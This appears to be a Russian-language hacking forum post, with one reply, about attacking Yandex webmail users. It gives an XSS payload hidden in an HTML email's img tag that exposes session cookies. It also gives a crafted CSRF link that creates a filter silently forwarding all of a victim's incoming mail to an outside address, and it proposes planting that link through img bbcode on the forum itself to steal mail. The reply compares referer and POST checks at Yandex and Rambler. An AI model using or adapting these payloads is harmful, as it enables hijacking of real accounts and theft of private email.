1. XSS При получении письма в html-формате, url картинки из img тэга добавляется в onerror событие. чтобы получить всплывающее окно с cookies, нужно отправить письмо вида Code: <img src=http://ya.ru/a?');alert(document.cookie+'> 2. Mail Forwarding При создании почтовых фильтров возможна передача параметров методом get. при этом нет никакой дополнительной проверки. Если пользователь перейдет по ссылке вида Code: http://mail.yandex.ru/classic/action_setup_filter_create?filter_name=%20&letter=selected&logic=0&field1=from&field2=4&field3=neverwillbereceived&move_folder=%D0%92%D1%85%D0%BE%D0%B4%D1%8F%D1%89%D0%B8%D0%B5&cliker=forward&[email protected]&forward_with_store=on&order=1 то отныне вся входящая почта будет пересылаться также на адрес [email protected]. С помощью <?php header() ?> + apache + mod_rewrite можно похищать почту пользователей с незавершенными сессиями на yandex.ru, например, на этом ресурсе, используя img bbcode.
честно говоря я сам уже давно не проверял раньше для создания фильтра на яндексе вроде был важен реферер,гет запрос прокатывал На рамблере например реферер не помню проверяется или нет,вроде нет, но катит только пост запрос,по крайней мере когда это пробовал я..